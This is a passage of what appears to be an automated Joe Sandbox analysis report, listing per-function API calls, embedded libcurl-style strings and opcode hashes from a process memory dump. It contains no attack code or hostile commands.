                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Protocol option is unsupported
                                      • API String ID: 4135170618-2447703105
                                      • Opcode ID: cdbe8fff7c235e2b5b70781e67c2b9f7cb14dcdf91a2fe22f423ebb3431f2b73
                                      • Instruction ID: 12792899bf546755f89adeac3778a78d05651ba4734d2c18728b67ed07843fa9
                                      • Opcode Fuzzy Hash: cdbe8fff7c235e2b5b70781e67c2b9f7cb14dcdf91a2fe22f423ebb3431f2b73
                                      • Instruction Fuzzy Hash: B5F01D25A0DA46C6E740AF61A50412DF321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Blocking call in progress
                                      • API String ID: 4135170618-1991276421
                                      • Opcode ID: a5c60e1ee8bf5d81184b94d2fb959976981809f147ea94a7ac8ed459eb6c28b5
                                      • Instruction ID: aa2b82b2292ee3d60d162b0c9a82d352460849d79ddfa03aab0fa2214ea0958a
                                      • Opcode Fuzzy Hash: a5c60e1ee8bf5d81184b94d2fb959976981809f147ea94a7ac8ed459eb6c28b5
                                      • Instruction Fuzzy Hash: 0EF01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Descriptor is not a socket
                                      • API String ID: 4135170618-1741256102
                                      • Opcode ID: 437ba6f16f8799c3799ddd660ac0f6595b1bccea247c82ec74103ca5dd1dd095
                                      • Instruction ID: 76a93275b574ff71a43f7939812de4a30844d20a47ff208e05a3a05c588ee98f
                                      • Opcode Fuzzy Hash: 437ba6f16f8799c3799ddd660ac0f6595b1bccea247c82ec74103ca5dd1dd095
                                      • Instruction Fuzzy Hash: 9FF01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strncpy
                                      • String ID: Need destination address
                                      • API String ID: 4135170618-3579207779
                                      • Opcode ID: ba1d8ae39c5db8bc75cff9dff4939cde946e268064c5742541bd68eb4ecb1ea4
                                      • Instruction ID: 7391ddee794c4b1ded1563cf1498d8b48eacf3d0636a045c6a20df2249d94b5b
                                      • Opcode Fuzzy Hash: ba1d8ae39c5db8bc75cff9dff4939cde946e268064c5742541bd68eb4ecb1ea4
                                      • Instruction Fuzzy Hash: 20F01D25A0DA4686E740AF61A504129F321FF5CBD5F880071DA6E03BD4CF3DE888A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$freemalloc
                                      • String ID:
                                      • API String ID: 1422302691-0
                                      • Opcode ID: 1ce208d5ec36f2d3bb597d2c04d005f4b68a8429ae38c5918308a543f92300fa
                                      • Instruction ID: 4f7f79093ed44a67a8c7f39e30b9b6284b357e8fd64dc71db2003f644218ff1b
                                      • Opcode Fuzzy Hash: 1ce208d5ec36f2d3bb597d2c04d005f4b68a8429ae38c5918308a543f92300fa
                                      • Instruction Fuzzy Hash: A7519011E0D38295FB25BB267414279DA905F5DB80F8C4475CEAD073D6DE3CF44AA3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D2129D
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212B3
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212C9
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212DF
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D212F5
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D2130B
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D21321
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D229E4,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D21337
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: f3556a69d0b69a32f49c0ebe6b53497d61e2689ed8e070d1116b6ec3f7f9066e
                                      • Instruction ID: 086812a99c63ba3822e730e54d18603a91c5d42944ba7887685e43bee942a3fe
                                      • Opcode Fuzzy Hash: f3556a69d0b69a32f49c0ebe6b53497d61e2689ed8e070d1116b6ec3f7f9066e
                                      • Instruction Fuzzy Hash: F4216425649A46D2DB14AF62FD64468E324FF9CB80F8C1031CE2F477A1CE2CE4589798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc$isalnum
                                      • String ID: out of memory$too many globs$unmatched close brace/bracket
                                      • API String ID: 325662795-3324938048
                                      • Opcode ID: f5e6ed1f7fbc64d85857c151445cfd862b13009f39ac61ca5834e9a916b28999
                                      • Instruction ID: 6aa74541e62180976f350f6cecc09168a0fcdaee1d68c02bf228919a732b7138
                                      • Opcode Fuzzy Hash: f5e6ed1f7fbc64d85857c151445cfd862b13009f39ac61ca5834e9a916b28999
                                      • Instruction Fuzzy Hash: DE81D466A087818AF710DF15E4043BABBA4BF08BD8F544236DE6D57798CF38D058E3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$malloc
                                      • String ID: ;type=
                                      • API String ID: 2541711312-3507045495
                                      • Opcode ID: 845ea99e6000a35b575881edfaaffdda2adb82dae0fb81f3ba03170cdca312ed
                                      • Instruction ID: ed4ba786f34ba9321bd914be905521fe28b18fdd1c0e719124eafc298ad55b6a
                                      • Opcode Fuzzy Hash: 845ea99e6000a35b575881edfaaffdda2adb82dae0fb81f3ba03170cdca312ed
                                      • Instruction Fuzzy Hash: 68418172B0978695EB18AB25D5003A8E790FF4DB44F884175CB6D033D1DF7DE058A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: %sAuthorization: Negotiate %s$Proxy-
                                      • API String ID: 1294909896-2414494888
                                      • Opcode ID: f01fa2ed12cafdece1a06d7669750555970a9e0ab2ac527e5008d56ba6723131
                                      • Instruction ID: 61da334fb4d4edbb182413817218136707ee845cf3bc87b2a1929e0409fc4d63
                                      • Opcode Fuzzy Hash: f01fa2ed12cafdece1a06d7669750555970a9e0ab2ac527e5008d56ba6723131
                                      • Instruction Fuzzy Hash: 1931522660CF4682EB50EB51F8403BAE760FF98B90F480032DA6D576E4DF7CD4099798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLastfreemalloc
                                      • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                      • API String ID: 1010545285-3891197721
                                      • Opcode ID: ba145afff6e5f522989f16d6286bc4a0f190e14485ee5fbb2edcb13d6af5d281
                                      • Instruction ID: 007e1e67a1f375d831fadb576d5f306438fd523c8b2b9123d69bd6124bb7043b
                                      • Opcode Fuzzy Hash: ba145afff6e5f522989f16d6286bc4a0f190e14485ee5fbb2edcb13d6af5d281
                                      • Instruction Fuzzy Hash: FD71D232B09B458AF710EB65E404BACB3A1EF487A8F844135DE2D577D4DE38E40AD794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l$_strdup
                                      • String ID: %0*ld$internal error: invalid pattern type (%d)
                                      • API String ID: 3016644273-4294015770
                                      • Opcode ID: 14a02ed22ecfdcbd300f02462d670adcbff3c2091a6827b7582fa210a29e04f5
                                      • Instruction ID: 7d0a0e06180a41f412be1153ec34d1501c823d4ad9863ca955ac715ced0b6ad1
                                      • Opcode Fuzzy Hash: 14a02ed22ecfdcbd300f02462d670adcbff3c2091a6827b7582fa210a29e04f5
                                      • Instruction Fuzzy Hash: D2510A32A0C28545E715AB2491447BCEB90EF19B64FA84333CA7D473D8CE29E44BD7B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1F025
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F0E9
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F12F
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F176
                                        • Part of subcall function 00007FF7F8D10364: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D103B1
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F198
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F1AD
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1F1C3
                                        • Part of subcall function 00007FF7F8D1F1E8: strchr.LIBVCRUNTIME ref: 00007FF7F8D1F22D
                                        • Part of subcall function 00007FF7F8D1F1E8: strchr.LIBVCRUNTIME ref: 00007FF7F8D1F254
                                        • Part of subcall function 00007FF7F8D1F1E8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F309
                                        • Part of subcall function 00007FF7F8D1F1E8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F344
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$mallocstrchr
                                      • String ID:
                                      • API String ID: 3005890304-0
                                      • Opcode ID: 444eda21fc4e538332b76c7407c343f66f5d66c9f86f31eb7a5ccc632876f2ee
                                      • Instruction ID: 9a1280c4a4a3e5269e0eb2214ac8d0e2f25bf0c37b64f049ac218a880d5e25e5
                                      • Opcode Fuzzy Hash: 444eda21fc4e538332b76c7407c343f66f5d66c9f86f31eb7a5ccc632876f2ee
                                      • Instruction Fuzzy Hash: 07516E26608F9285EB10EF32E8506ADA7A4FF4CBD8F885431DE5E17758CE38D0499394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strtoll
                                      • String ID: Failed to parse FETCH response.$Found %I64u bytes to download$Written %I64u bytes, %I64u bytes are left for transfer
                                      • API String ID: 2044156862-2122842539
                                      • Opcode ID: aafc00ecd766ddc62470bbd8c3434e559b343eec8b0ea804b0316d6f46c5f18d
                                      • Instruction ID: 6a5a40b663e710e03e8a1ad825a14e7025de8f388fb4602a2e82d49ad19a6ebb
                                      • Opcode Fuzzy Hash: aafc00ecd766ddc62470bbd8c3434e559b343eec8b0ea804b0316d6f46c5f18d
                                      • Instruction Fuzzy Hash: 0951AD6260868296EB14AF26E4402ADF790FF49BD0F984131DABD176D1CF3CE159B394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: %x%s$Read callback asked for PAUSE when not supported!$operation aborted by callback$read function returned funny value
                                      • API String ID: 1488884202-1291304620
                                      • Opcode ID: ce392f7511f7acfad5f7fb7d0d61469b5d14937d18caabb531c99bf32884f39a
                                      • Instruction ID: 7f9719eef414fe7af981f1f74c0dd925f47f9e23e9077e770ef3410f3ca0e00d
                                      • Opcode Fuzzy Hash: ce392f7511f7acfad5f7fb7d0d61469b5d14937d18caabb531c99bf32884f39a
                                      • Instruction Fuzzy Hash: DC41D062A086C6A6F758EB21E4443F8E691BF087A4F880231DE3D072D1DF7CA499E354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_l
                                      • String ID: %s %s$LIST$RETR
                                      • API String ID: 2941638530-469064825
                                      • Opcode ID: 58f4b52fed464b4a8ec3b91b5802b3e0923a550d5eee7ea010cbcebe2f1aa79c
                                      • Instruction ID: e397d508d72297bbbff2852ef75e37395cd6aada17ffcaf567ded87e1a87ddfd
                                      • Opcode Fuzzy Hash: 58f4b52fed464b4a8ec3b91b5802b3e0923a550d5eee7ea010cbcebe2f1aa79c
                                      • Instruction Fuzzy Hash: 5A31B172A0CBC295E758AB25E5500BAFB90EF49B90F988136DB7D033C5DF28D448E394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: Data$Header$[%s %s %s]$from
                                      • API String ID: 1488884202-3178933089
